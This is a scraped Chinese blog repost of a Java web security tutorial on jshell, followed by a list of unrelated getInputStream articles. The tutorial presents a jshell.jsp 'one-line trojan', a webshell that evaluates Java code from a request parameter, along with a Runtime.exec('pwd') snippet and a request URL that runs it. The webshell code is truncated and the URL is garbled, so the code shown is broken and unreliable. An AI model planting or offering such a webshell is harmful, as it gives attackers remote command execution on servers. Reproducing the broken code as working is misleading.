java使用getinputstream_Java Web安全 || Java基础 JShell

最新推荐文章于 2021-03-07 02:51:07 发布
最新推荐文章于 2021-03-07 02:51:07 发布
阅读量325 收藏
点赞数
文章标签: java使用getinputstream
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29958797/article/details/113628731
版权

点击上方“凌天实验室”,“星标或置顶公众号”

漏洞、技术还是其他,我都想第一时间和你分享

7b2836530936bd8b954c837c3a910d26.png

【历史】已连载更新全部内容:【菜单栏】-【JAVA SEC】

Java 9开始提供了一个叫jshell的功能,jshell是一个REPL(Read-Eval-Print Loop)命令行工具,提供了一个交互式命令行界面,在jshell中我们不再需要编写类也可以执行Java代码片段,开发者可以像pythonphp一样在命令行下愉快的写测试代码了。

命令行执行jshell即可进入jshell模式:

97c8294734d6ffc7c73426578381a9e9.png

输入:/help可以查看具体的命令:

|  键入 Java 语言表达式, 语句或声明。
|  或者键入以下命令之一:
|  /list [|-all|-start]
|      列出您键入的源
|  /edit 
|      编辑按名称或 id 引用的源条目
|  /drop 
|      删除按名称或 id 引用的源条目
|  /save [-all|-history|-start] 
|      将片段源保存到文件。
|  /open 
|      打开文件作为源输入
|  /vars [|-all|-start]
|      列出已声明变量及其值
|  /methods [|-all|-start]
|      列出已声明方法及其签名
|  /types [|-all|-start]
|      列出已声明的类型
|  /imports
|      列出导入的项
|  /exit 
|      退出 jshell
|  /env [-class-path ] [-module-path ] [-add-modules ] ...
|      查看或更改评估上下文
|  /reset [-class-path ] [-module-path ] [-add-modules ]...
|      重启 jshell
|  /reload [-restore] [-quiet] [-class-path ] [-module-path ]...
|      重置和重放相关历史记录 -- 当前历史记录或上一个历史记录 (-restore)
|  /history 
|      您键入的内容的历史记录
|  /help [<command>|]
|      获取 jshell 的相关信息
|  /set editor|start|feedback|mode|prompt|truncation|format ...
|      设置 jshell 配置信息
|  /? [<command>|]
|      获取 jshell 的相关信息
|  /!
|      重新运行上一个片段
|  /
|      按 id 重新运行片段
|  /-
|      重新运行前面的第 n 个片段
|
|  有关详细信息, 请键入 '/help', 后跟
|  命令或主题的名称。
|  例如 '/help /list' 或 '/help intro'。主题:
|
|  intro
|      jshell 工具的简介
|  shortcuts
|      片段和命令输入提示, 信息访问以及
|      自动代码生成的按键说明
|  context
|      /env /reload 和 /reset 的评估上下文选项

使用JShell执行代码片段

jshell不仅是一个命令行工具,在我们的应用程序中同样也可以调用jshell内部的实现API,也就是说我们可以利用jshell来执行Java代码片段而不再需要将Java代码编译成class文件后执行了。

jshell调用了jdk.jshell.JShell类的eval方法来执行我们的代码片段,那么我们只要想办法调用这个eval方法也就可以实现真正意义上的一句话木马了。

jshell.jsp一句话木马示例:

"src"))%>

程序执行后会输出一些不必要的信息,如果有强迫症可以修改为:

"src")).get(0).value().replaceAll("^\"", "").replaceAll("\"$", "")%>

然后我们需要编写一个执行本地命令的代码片段:

new String(Runtime.getRuntime().exec("pwd").getInputStream().readAllBytes())

Java 9java.io.InputStream类正好提供了一个readAllBytes方法,我们从此以后再也不需要按字节读取了。

浏览器请求:http://localhost:8080/jshell.jsp?src=new%20String(Runtime.getRuntime().exec(%22pwd%22).getInputStream().readAllBytes()).exec("pwd").getInputStream().readAllBytes()))

程序执行结果:

c782edaac2e73aed14a20c8a306be89d.png

**如果您在阅读文章的时候发现任何问题都可以通过Vchat与我们联系,也欢迎大家加入javasec微信群一起交流。

Vchat获取方式:对话框发送“javasec”

a72597b5190d42e6338b96228ab7af0f.png d60eeef734ea123217c42284c38dfa02.png凌天实验室

凌天实验室,是安百科技旗下针对应用安全领域进行攻防研究的专业技术团队,其核心成员来自原乌云创始团队及社区知名白帽子,团队专业性强、技术层次高且富有实战经验。实验室成立于2016年,发展至今团队成员已达35人,在应用安全领域深耕不辍,向网络安全行业顶尖水平攻防技术团队的方向夯实迈进。

兔老板AirS
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java中getinputstream_java getinputstream
weixin_39611275的博客
02-24 1622
2 二、 I/O类层次结构 Java提供超过60个不同的流类型,这些流 类包含在上面提到的java.io包中,四个基本的抽象类: InputStream、OutputStream、Reader和 Writer......其他还有值得一提的就是,在 jdk1.4 中,新增了 NIO 包,优化了一些 IO 处理的速度,所以 在 FileInputStream 和 FileOutputStream 中新...
java 中getinputstream_Java Process getInputStream()方法与示例
weixin_28487433的博客
03-07 9212
流程类getInputStream()方法getInputStream()方法在java.lang包中可用。getInputStream()方法用于获取流程和子流程的输入流。getInputStream()方法是一个非静态方法,只能通过类对象访问,如果尝试使用类名称访问该方法,则会收到错误消息。返回输入流时,getInputStream()方法不会引发异常。语法:publicabstractI...
getInputStream与getReader方法
ruilinruirui
11-07 310
getInputStream与getReader方法 getInputStream 方法用于返回的一个代表实体内容的输入流对象,其类型为javax.servlet.ServletInputStream。 getReader方法用于返回的一个代表实体内容的BufferedReader对象,返回的BufferedReader对象将实体内容中的字节数据按照请求消息中指定的字符集编码转换成文本字符...
java使用getinputstream_java解析数据接口获取json对象
weixin_35426022的博客
02-03 1237
最近小编在做项目的时候,需要解析一个url以获取其数据,开始我为简便,使用了Postman这个工具来解析,也获取了json对象。但后也发现,它没法直接连接数据库,也就是说这些数据不能直接存入数据库,经过查询,使用node.js作为中介可以解决这个问题,后又发现,连接后一次只能向数据库post一个对象,后就直接使用java解析吧!方法很多,在这使用常用HTTP方法的POST和GET为例吧,...
java filter post 参数_LogFilter.java
weixin_35790607的博客
02-24 326
package com.suqiang.cloud.filter;import java.io.BufferedReader;import java.io.DataInputStream;import java.io.DataOutputStream;import java.io.File;import java.io.FileOutputStream;import java.io.StringR...
WEB_server_to_create_Java_code_achieve_Socket.rar_java web serve
09-20
本主题聚焦于使用Java编程语言通过Socket来实现一个简单的Web服务器。Socket在计算机网络中扮演着通信桥梁的角色,允许两个程序之间建立连接并交换数据。 首先,我们要理解Java中的Socket编程。Socket是Java网络...
ftp_java.rar_ftp java_java ftp
09-23
Java编程语言中,我们可以使用Java的内置库java.net和java.io来实现FTP功能。本教程将详细介绍如何使用Java实现简单的FTP功能。 首先,我们需要了解FTP的主要操作,包括连接服务器、登录、上传文件、下载文件和...
Java_file_send.rar_java sendfile
最新发布
09-24
总结,通过Java进行文件网络传输涉及了Socket编程、输入输出流的使用、异常处理、性能优化以及可能的安全性和用户体验方面的考虑。在`Java_file_send`这个例子中,我们可以学习到如何将这些概念应用于实际的代码实现...
JKDS.rar_java Tcp _java tcp jsp_tcp
09-21
标题“JKDS.rar_java Tcp _java tcp jsp_tcp”表明这是一个关于使用Java实现TCP协议进行网络通信的项目,其中可能包括服务器端(Server)和客户端(Client)的代码实现,并可能涉及到了JSP(Java Server Pages)技术...
java_http_down.rar_down JAVA_java http
09-23
这个“java_http_down.rar_down JAVA_java http”资源显然包含了一个使用JAVA实现HTTP协议来下载文件的示例。我们将深入探讨如何在Java中实现HTTP请求以及文件下载的相关知识点。 1. **HTTP协议基础**: - HTTP是...
java 中getinputstream_java.lang.Process.getInputStream()方法实例
weixin_33173924的博客
03-07 556
全屏java.lang.Process.getInputStream()方法获取子进程的输入流。数据流获取由该Process对象表示的进程的标准输出流管道的数据。声明以下是java.lang.Process.getInputStream()方法的声明publicabstractInputStreamgetInputStream()参数NA返回值此方法返回输入流连接到子进程的正常输出。异常NA...
java io inputstream_java IO之输入流——InputStream
weixin_32965939的博客
02-12 345
java的基本输入流是java.io.InputStream,该抽象类定义了输入流的基本输入操作方法,实现自该抽象类的子类都有定义自己的数据源,例如ByteArrayInputStream的构造函数指定了ByteArrayInputStream输入流的数据源必须是一个字符数组。这就可以有多种不同的数据源,包括:字符数组、String对象、文件、“管道”、一个由其他种类的流组成的序列...1 pub...
java使用getinputstream_如何避免Java应用中的内存泄露
weixin_31541755的博客
01-21 602
背景最近同事做的分词器项目遇到Memory Leak问题,应用会把Jieba的C++版本作为so库提供给一个ES的分词器wrapper使用,以避免Java和C++版本Jieba在分词上的差异。上线了两天,碰到了问题,让我帮忙看下。我查了一下相关的Java文档,有几篇极有价值,摘录和翻译于此。有需要的同学自取。什么是Java内存泄露Java相较于其他语言、最核心的改进就是具有内存管理功能的虚拟机JV...
javaInputStream的用法
cheng
01-06 1602
/* * * 功能:InputStream的用法 */ package com.test2; import java.io.*; public class Demo2 { /** * @param args */ public static void main(String[] args) { // TODO Auto-generated method stub
Socket类的getInputStream方法与getOutputStream方法的使用
anthony_ju的博客
08-29 2万+
Socket类的getInputStream方法与getOutputStream方法的使用 客户端上的使用 getInputStream方法可以得到一个输入流,客户端的Socket对象上的getInputStream方法得到输入流其实就是从服务器端发回的数据。 getOutputStream方法得到的是一个输出流,客户端的Socket对象上的getOutputStream方法得到的输出流其实...
getInputStream与getOutputStream详解以及相互转换
热门推荐
FJcsdn的博客
06-09 3万+
客户端上的使用1.getInputStream方法可以得到一个输入流,客户端的Socket对象上的getInputStream方法得到输入流其实就是从服务器端发回的数据。2.getOutputStream方法得到的是一个输出流,客户端的Socket对象上的getOutputStream方法得到的输出流其实就是发送给服务器端的数据。服务器端上的使用1.getInputStream方法得到的是一个输入...
Java Process getInputStream()方法与示例
cumtv80668的专栏
07-10 8539
流程类的getInputStream()方法 (Process Class getInputStream() method) getInputStream() method is available in java.lang package. getInputStream()方法在java.lang包中可用。 getInputStream() method is used to get the ...
Java Web开发基础:请求处理与常用方法解析
以上内容构成了对Java Web开发基础知识的一个简要概述,对于理解请求处理流程和使用Request对象进行数据交互具有重要作用。通过深入理解和实践这些知识点,开发者能够更好地构建和维护复杂的Web应用程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值